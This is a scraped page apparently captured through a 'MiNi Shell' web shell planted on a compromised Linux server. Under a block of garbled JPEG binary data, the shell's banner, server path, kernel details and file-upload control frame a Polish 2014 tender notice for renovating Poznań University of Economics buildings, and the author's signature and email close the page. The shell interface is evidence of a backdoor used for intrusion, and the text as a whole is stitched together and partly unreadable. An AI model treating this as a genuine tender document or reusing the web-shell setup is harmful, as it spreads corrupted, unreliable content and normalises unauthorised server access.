JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140324/62277-N-2014.html

<p class="kh_header"><b>Poznań: Remont pomieszczeń w obiektach Uniwersytetu Ekonomicznego w Poznaniu</b><br>
<b>Numer ogłoszenia: 62277 - 2014; data zamieszczenia: 24.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Ekonomiczny w Poznaniu , al. Niepodległości 10, 61-875 Poznań, woj. wielkopolskie, tel. 061 8569000, 8569500, faks 061 8543988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ue.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w obiektach Uniwersytetu Ekonomicznego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie robót remontowych w pomieszczeniach zlokalizowanych w różnych budynkach na terenie miasta Poznania będących własnością Uniwersytetu Ekonomicznego w Poznaniu:
w budynku głównym A wraz z budynkiem skrzydła - zlokalizowanych przy 
al. Niepodległości 10,
w budynku B - zlokalizowanym przy al. Niepodległości 12,
w budynku C - zlokalizowanym przy ul. Towarowej 53,
w wieżowcu Collegium Altum zlokalizowanym przy ul. Powstańców Wielkopolskich 16,
w budynku magazynowym zlokalizowanym przy ul. Andrzejewskiego 11/17,
Collegium Linguisticum zlokalizowanym przy ul. Taczaka 9.
Hali Sportowej - zlokalizowanej przy ul. Dożynkowej 9
2.Zakres prac został określony w dokumentacji pt. Remont pomieszczeń w obiektach Uniwersytetu Ekonomicznego w Poznaniu. Dokumentacja techniczna (opis techniczny) wraz ze specyfikacją techniczną wykonania i odbioru oraz przedmiarami robót stanowią odpowiednio załączniki nr 8 i nr 9 do niniejszej SIWZ.
Prace remontowe polegać będą głównie na wykonaniu:
robót przygotowawczych, demontażowych i rozbiórkowych;
robót remontowych w zakresie podłóg i posadzek 
robót remontowych związanych z odnowieniem ścian i sufitów;
montażu ścianek działowych z płyt gipsowo-kartonowych
czyszczeniu i malowaniu grzejników żeliwnych i podokienników;
wykonaniu robót związanych z instalacjami elektrycznymi;
wykonaniu robót związanych z instalacjami sanitarnymi.
Zakres przedmiotu zamówienia obejmuje również wykonanie prac pomocniczych tj:
przygotowanie pomieszczeń do remontu polegające na wylokowaniu mebli, zabezpieczeniu folią okien i drzwi przed zabrudzeniem, 
wywiezieniu materiałów rozbiórkowych;
myciu: okien, niemalowanych drzwi, korytek z instalacją okablowania strukturalnego, wyłączników, gniazdek itp.
konieczne przemieszczanie mebli i wyposażenia w obrębie terenu budowy, a po zakończeniu robót - pomieszczenia muszą być umeblowane w sposób pierwotny.
3.Prace remontowe opisane w dokumentacji wykonywane będą w kilku etapach obejmujących remont grup pomieszczeń (po kilka pomieszczeń), uzależnionych zakresem (wielkością) od szczegółowych zapotrzebowań określanych przez Zamawiającego na bieżąco w trakcie trwania umowy z Wykonawcą. Etapy robót mogą różnić się zatem wielkością (ilością robót).
4.Zamawiający ma prawo zrezygnować z wykonania części robót i dostaw.
5.Etapy robót będą w trakcie trwania umowy określane przez Zamawiającego 
w formie pisemnej z podaniem lokalizacji pomieszczenia do remontu oraz zakresem robót i terminem ich wykonania.
Przewidywana ilość etapów: 4 do 6.
Do realizacji poszczególnych etapów remontów Wykonawca musi przystąpić 
w ciągu 7 dni od otrzymania pisemnego zlecenia ich realizacji.
6.Po zakończeniu realizacji zleconego etapu robót stwierdzonego protokołem bezusterkowego odbioru oraz przedłożonego kosztorysu powykonawczego zatwierdzonego przez Zamawiającego, Wykonawca może wystawić fakturę częściową.
7.Zamawiający dopuszcza zastosowanie przez Wykonawcę materiałów i urządzeń innych producentów niż określono w dokumentacji technicznej pod warunkiem, 
że zaproponowane przez Wykonawcę materiały i urządzenia posiadają właściwości 
i cechy, a w szczególności parametry techniczne, nie gorsze od opisanych 
w dokumentacji technicznej i zostaną zaakceptowane przez Zamawiającego.
8.Zamawiający wymaga udzielenia co najmniej 36 miesięcznej gwarancji 
na wykonane prace, użyte materiały i zainstalowane urządzenia, bez względu 
na terminy udzielone przez ich producentów lub dostawców. Gwarancja obejmować będzie zachowanie stanu elementów robót wykonanych w ramach remontu i ich poprawnego działania, z pominięciem naturalnego zużycia. Usunięcie wad i usterek w okresie gwarancji następuje na koszt Wykonawcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50%</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu, obowiązany jest wnieść wadium w terminie do 8 kwietnia 2014 r., godz. 08:00 - w wysokości: 5 000,00 zł (słownie: pięć tysięcy złotych 00/100) na konto Uniwersytetu Ekonomicznego w Poznaniu, 
Al. Niepodległości 10 w BZ WBK 3 Oddział Poznań 54 10901359 0000000035018918 lub wadium w formie poręczeń bankowych lub w poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancji bankowych, gwarancji ubezpieczeniowych lub w formie poręczeń udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
2.Wadium musi być ważne przez okres związania ofertą. Oferta nie zabezpieczona wadium w wymaganej formie, zostanie odrzucona bez rozpatrzenia. 
3.Kserokopię dowodu wniesienia wadium lub gwarancji (poręczenia) należy załączyć do oferty.
4.Oryginał gwarancji lub poręczenia należy złożyć w miejscu składania ofert przed upływem terminu składania ofert.
5.Zamawiający zwróci wadium na zasadach określonych w art. 46 pzp.
6.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, ale zostanie pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizję bankową za przelew pieniędzy na rachunek wskazany przez Wykonawcę. 
7.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:
, którego oferta została wybrana odmówi podpisania umowy 
w sprawie zamówienia publicznego na warunkach określonych w ofercie;
-	Wykonawca, którego oferta została wybrana nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy. 
Wykonawca na wezwanie o którym mowa w art. 26 ust 3 pzp nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 lub pełnomocnictw, chyba, że udowodni, że wynika to  przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony gdy Wykonawca przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zlecenia obejmującego roboty budowlane o wartości min. 200 000,00 zł brutto, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Dowodem, o którym mowa powyżej, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane będzie poświadczenie podmiotów, na rzecz których usługi były (są) wykonane, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie o wykonaniu lub wykonywaniu usług należycie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Ocenie podlegać będzie wykaz (załącznik nr 5 do SIWZ oraz załączone poświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie przychodu z działalności średnio rocznie za ostatnie 3 lata obrotowe (zatwierdzonego przez organy uprawnione Wykonawcy) w wysokości minimum 400 000,00 złotych w sprawozdaniu finansowym albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami 
o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, 
a jeżeli okres działalności jest krótszy - za ten krótszy okres - ocenie podlegać będzie wyżej wymieniony wykaz przychodu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wyceniony przedmiar robót (kosztorys ofertowy) sporządzony metodą uproszczoną, zawierający składniki cenotwórcze oraz ceny jednostkowe poszczególnych rodzajów robót - załącznik nr 10.
2.	Oświadczenie Wykonawcy o sposobie zabezpieczenia mediów podczas robót - załącznik nr 6.
3.	Dowód wniesienia wadium. W przypadku wniesienia wadium w innej formie 
niż pieniądze należy w ofercie złożyć kopię dokumentu, a oryginał dostarczyć 
w miejscu składania ofert do końca terminu składania ofert.
4.	Wypełniony i podpisany formularz oferty - załącznik nr 1 - zawierający m.in. składniki cenotwórcze do wyceny robót nie ujętych w przedmiarze i zamówień uzupełniających.
5.	Pisemne oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych - załącznik nr 3.
6.	Pisemne oświadczenie Wykonawcy o braku zaległości podatkowych oraz 
o braku zaległości w opłacaniu składek na ubezpieczenie społeczne - załącznik nr 4
7.	Informacje dotyczące wysokości przychodu z działalności średnio rocznie za ostatnie 3 lata</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza:
a)	aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.,
b)	zmianę terminów realizacji etapu zamówienia objętego pojedynczym zapotrzebowa-niem jak i całego zamówienia z przyczyn niezależnych od Wykonawcy lub Zama-wiającego, które to przyczyny każda ze Stron musi udokumentować,
c)	zmniejszenie zakresu przedmiotu zamówienia oraz związane z tym zmniejszenie wartości umowy, wynikające z przyczyn niezależnych od Zamawiającego 
lub Wykonawcy, które to przyczyny każda ze Stron musi udokumentować,
d)	zmianę zastosowanej technologii wykonania zamówienia na lepszą (np. nowocześniejszą, mniej energochłonną), po zaakceptowaniu jej przez Zamawiającego pod warunkiem, iż cena oferty nie ulegnie zwiększeniu; w takim przypadku dopuszcza się zmniejszenie wynagrodzenia Wykonawcy,
e)	wykonanie robót zamiennych bez zwiększenia wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ue.poznan.pl/pl/wspolpraca,c10/zamowienia-publiczne,c115/ogloszenia,c127/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Ekonomiczny w Poznaniu, al. Niepodległości 10, bud B, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2014 godzina 08:00, miejsce: Uniwersytet Ekonomiczny w Poznaniu, al. Niepodległości 10, bud B, pok. 016.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com